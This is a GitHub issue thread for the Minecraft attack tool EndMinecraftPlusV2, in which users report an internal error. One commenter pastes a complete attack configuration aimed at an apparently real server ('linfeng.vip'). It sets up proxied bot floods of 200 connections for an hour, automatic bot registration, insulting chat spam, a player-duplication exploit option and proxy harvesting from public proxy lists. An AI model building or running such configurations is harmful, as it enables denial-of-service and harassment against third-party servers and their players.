### ISSUE TITLE
Internal Error

### ISSUE THREAD

**Issue by Bliod-Cook** [SerendipityR-2022/EndMinecraftPlusV2#1]
![image](https://user-images.githubusercontent.com/108209631/185735062-093a93e4-dcda-46c9-8156-dd614734503f.png)

经常会有这样的显示

**Comment by SerendipityR-2022** [comment]
请详细描述问题复现步骤

**Comment by SerendipityR-2022** [comment]
此问题目前无法被复现 若长时间未回复将被关闭。

**Comment by tumuidle** [comment]
> 此问题目前无法被复现 若长时间未回复将被关闭。

我这里也出现了，这次是java8的，假人和影分身都有

```
##############################
#  EndMinecraftPlusV2        #
#    Forked by SerendipityR  #
##############################

AttackSettings:
  Address: "linfeng.vip"
  Port: 25565
  # 攻击方式:
  # 1 - BotAttack - 集群假人(代理)
  # 2 - MotdAttackP - MOTD压测(代理)
  # 3 - MotdAttack - MOTD压测(无代??
  # 4 - DoubleAttack - 影分身攻??代理，仅原版单服可用)
  Method: 1
  Time: 3600
  ConnectDelay: 250
  # 实际连接数由代理质量和机器性能有关
  # 进行无代理Motd压测时不建议大于32
  MaxConnections: 200
  # 旧版漏洞利用，大概率无效
  TabAttack: false
  AntiAttackMode: false
  DoubleExploitPlayer: "ImOldSix_666"
  ShowFails: false

BotSettings:
  # 可用占位??
  # $rnd - 随机字符
  # $pwd - 随机生成密码
  BotName: "ImOldSix_$rnd"
  BotCount: 20
  RejoinCount: 5
  RejoinDelay: 2000
  RejoinDetect:
    - "AntiAttack"
  ClickVerifiesDetect:
    - "点击验证"
  Register&Login: true
  RegisterCommands:
    - "/register $pwd $pwd"
    - "/login $pwd"
  ChatSpam: true
  CustomChat:
    - "乐子服LLLLLL $rnd"
  ChatDelay: 3000

Proxy:
  # 代理获取方式:
  # 1 - API - 从API获取
  # 2 - File - 从本地读??  # 3 - File + API - 两种方式同时获取
  GetType: 2
  # 代理类型:
  # 1 - HTTP/HTTPS
  # 2 - SOCKS4
  # 3 - SOCKS5
  ProxyType: 1
  UpdateTime: 300
  File: "proxies.txt"
  APIs:
    - "http://www.66ip.cn/mo.php?tqsl=9999"
    - "https://www.89ip.cn/tqdl.html?api=1&num=9999"
  # 保存能连接到目标服务器的代理地址 (如果支持)
  # 位置: working-proxies.txt
  SaveWorkingProxy: true
```
